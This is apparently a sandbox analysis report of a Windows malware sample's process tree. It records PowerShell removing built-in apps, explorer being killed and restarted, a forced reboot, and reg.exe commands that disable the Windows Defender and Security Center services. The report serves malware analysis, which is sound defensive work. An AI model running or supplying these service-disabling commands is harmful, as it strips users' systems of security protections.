C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.BingWeather*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*microsoft.windowscommunicationsapps*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.Getstarted*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.Microsoft3DViewer*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.GetHelp*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.WindowsFeedbackHub*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im explorer.exe2⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start %windir%\explorer.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe3⤵
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\shutdown.exe"C:\Windows\System32\shutdown.exe" -r -t 02⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f1⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc /v Start /t REG_DWORD /d 4 /f1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa383a855 /state1:0x41c64e6d1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads